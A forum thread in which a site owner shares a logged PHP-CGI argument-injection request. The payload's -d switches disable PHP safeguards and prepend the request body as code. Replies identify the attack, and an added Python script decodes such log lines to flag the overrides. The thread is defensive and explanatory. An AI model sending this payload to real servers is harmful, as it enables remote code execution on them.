Thread: Looking for someone with PHP and webservers knowledge

  1. #1

    Not programming but maybe here it'll reach people that know about this.

    I have a question.
    Someone's been scanning a webpage for "/cgi-bin/php" "/cgi-bin/php5" and similar and when he finds one that works he sends a POST request with:
    Code:
    -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
    So the log shows this:
    Code:
     "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 200 117 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
    What the fuck is he trying to do?

  2. #2
    Zachafer
    That's the Plesk Zero Day exploit. Basically the hacker is trying to send commands to PHP CLI. Read more:


  3. The Following 2 Users Say Thank You to Zachafer For This Useful Post:

    Daviid (10-26-2015),j03 (10-26-2015)
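
As an added example (not code from anyone in this thread): a small Python check a defender could run over access logs to decode requests like the one logged in the first post and list the `-d` ini overrides they carry. The sample log lines, the IP addresses and the names `inspect_line` and `WATCHED_INI` are constructed for illustration.

```python
import re
import shlex
from urllib.parse import unquote_plus

# Request line inside a quoted access-log entry: "METHOD /path?query HTTP/x.y"
REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<path>[^ ?"]+)(?:\?(?P<query>[^ "]*))? HTTP/[\d.]+"')
# Paths the first post says were probed ("/cgi-bin/php", "/cgi-bin/php5" and similar).
PHP_CGI_PATH = re.compile(r'^/cgi-bin/php[^/]*$')
# The ini settings the logged request tries to override.
WATCHED_INI = {"allow_url_include", "safe_mode", "suhosin.simulation", "disable_functions",
               "open_basedir", "auto_prepend_file", "cgi.force_redirect", "cgi.redirect_status_env"}

# Constructed sample lines; the first reuses a shortened piece of the query logged above.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Oct/2015:10:00:00 +0000] "POST /cgi-bin/php?%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 117',
    '203.0.113.8 - - [26/Oct/2015:10:00:05 +0000] "GET /cgi-bin/php?page=about HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Oct/2015:10:00:09 +0000] "GET /search?q=-d+test HTTP/1.1" 200 812',
]


def inspect_line(line):
    """Return a finding dict if the log line carries php-cgi switches in its query, else None."""
    m = REQUEST_RE.search(line)
    if not m or not PHP_CGI_PATH.match(m["path"]) or not m["query"]:
        return None
    decoded = unquote_plus(m["query"])          # '+' -> space, %XX -> character
    if not decoded.lstrip().startswith("-"):    # ordinary key=value query, not a switch
        return None
    try:
        args = shlex.split(decoded)
    except ValueError:                          # unbalanced quotes: fall back to plain split
        args = decoded.split()
    # Pair every "-d" with the ini assignment that follows it.
    overrides = {}
    for flag, value in zip(args, args[1:]):
        if flag == "-d" and "=" in value:
            key, _, val = value.partition("=")
            overrides[key] = val
    return {"method": m["method"], "path": m["path"], "decoded": decoded,
            "overrides": overrides, "watched": sorted(WATCHED_INI.intersection(overrides))}


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        finding = inspect_line(entry)
        if finding:
            print(finding["method"], finding["path"], finding["watched"], finding["decoded"])
```

A hit with a 200 status, as in the logged request, is worth following up on the server itself; the decoded string shows exactly which settings the request tried to change.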

  4. #3
    j03
    Quote Originally Posted by Zachafer View Post
    That's the Plesk Zero Day exploit. Basically the hacker is trying to send commands to PHP CLI. Read more:

    Beat me to it.

    A quick Google search of what the IP is requesting and sending will give you this answer.

    (you need an account to see links) stop the attack and patch your server if it is using Linux.


  5. The Following User Says Thank You to j03 For This Useful Post:

    Daviid (10-26-2015)

  6. #4

    Thank you, I'll read through those links.

    Sent from my toaster.


    Edit: now they're trying to download a perl script with shellshock modifying the user agent -.-...
    Of course everything is up to date now
    Last edited by Daviid; 10-27-2015 at 05:50 AM.
